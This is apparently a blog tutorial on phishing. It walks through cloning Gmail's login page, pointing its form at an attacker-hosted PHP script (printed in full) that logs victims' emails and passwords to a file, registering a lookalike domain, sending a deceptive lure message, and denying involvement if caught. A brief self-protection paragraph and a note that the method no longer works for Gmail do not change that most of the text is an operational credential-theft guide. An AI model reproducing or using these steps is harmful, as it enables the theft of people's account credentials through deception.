Fake it till you make it.
What is Phishing ?
Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware etc. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.
This tutorial will explain you how to create fake login page for phishing, in this case we are going to go with Gmail as an example. This Procedure can be used to make fake pages for any other website in the same way. Yahoo!, Facebook, Myspace – Any website you want can be made using this tutorial.
Step 1:
Head over to the website gmail.com. Right Click anywhere and Save the Page as an HTML file.
Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely “google_transparent.gif”, “mail_logo.png”.
Step3:
Now we need to upload these images to any online image hosting website, for example – tinypic.com, postimage.com or photobucket.com. After uploading go to the image where you uploaded it and copy the URL of each image.
Step4:
Open the HTML file in any text editor like NotePad or MS Word.(You can use CTRL + F for the following)- Search for “google_transparent.gif” (without quotes) and replace it with corresponding URL. Search for “mail_logo.png” (without quotes) and replace it with corresponding URL.
Step 5:
In the same file, Search for :
action=”https://www.google.com/accounts/ServiceLoginAuth”
And replace it with :
action=”http://yoursite.urlhere/login.php”
(You have to write down your fake websites URL there, See Step 7 for creating it.)
Now save the file.
Step6:
Now you need to create a PHP file called “login.php”. So open up a text editor (like NotePad) and type the following (You can copy it from this pastie):
<?php $handle = fopen(“password.txt”, “a”);
fwrite($handle,$_POST[“Email”]);
fwrite($handle,”\n”); fwrite($handle,$_POST[“Passwd”]);
fwrite($handle,”\n”);
fwrite($handle,”\n”);
fclose($handle) ;
header(“Location:https://www.google.com/accounts/ServiceLoginAuth”);
exit;
?>
Now Save it as login.php
Step 7:
Open up notepad again and just save a new file as “pswrds.txt” without any contents.(Empty file)
Now upload those three files(namely :- index.html, login.php, pswrds.txt) in any of subdomain Web hosting site. (Note: that web hosting service must have php feature.)
You can use the following :
sites:110mb.com
spam.com
justfree.com
007sites.com
(or simply google it).
Follow the instructions in the Web hosting site and setup you fake login page. Make sure you name the URL something like g00gle.com or anything that you think would be the least suspicious.(Just make sure the URL doesn’t stand out in the address bar as it may alert the victim.)
Step 8:
Create a fake email account, that is if you prefer to send the phishing webpage link anonymously.
Step 9:
And now all you have to do is send the victim something like: ‘Gmail starts new feature : To use this service, log in to this page’ ,along with this send the link to your fake website.
Note: For user to believe change your phishing web page url use any of free short url sites like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
Nevertheless, if you do get caught act like you had no clue: ‘OMG ! I logged in to that website too , I’m going to change my pass now ! you do the same, quickly !’.
Protecting Yourself :
Phishing webpages are meant to fool the victim into thinking that the website they are logging into is genuine whereas it is actually a completely different website. The only sure-fire way to protect oneself from being the victim is to always make sure that the website you are giving your account and password to is bona fide by simply peeking at the address bar in your web browser. Also, avoid following any links from any dodgy websites, scam emails or even the comment sections in various places.
Everyone is guilty until proven innocent. Assume hostility or accept vulnerability.
*EDIT: This method currently does not work. At the time of writing, the files we upload to the hosting website were the same as mentioned here. As of now, however, these files are nowhere to be found. For some reason, the Gmail team seems to modify and change the log in page almost every other week causing the phishing method to be slightly different every time. Hence, kindly try out other hacking techniques for the time being. Since the phishing method is practically the same barring a few file names .You may also attempt the same method with other websites (Yahoo!, Facebook etc.) on your own.
0 comments:
Post a Comment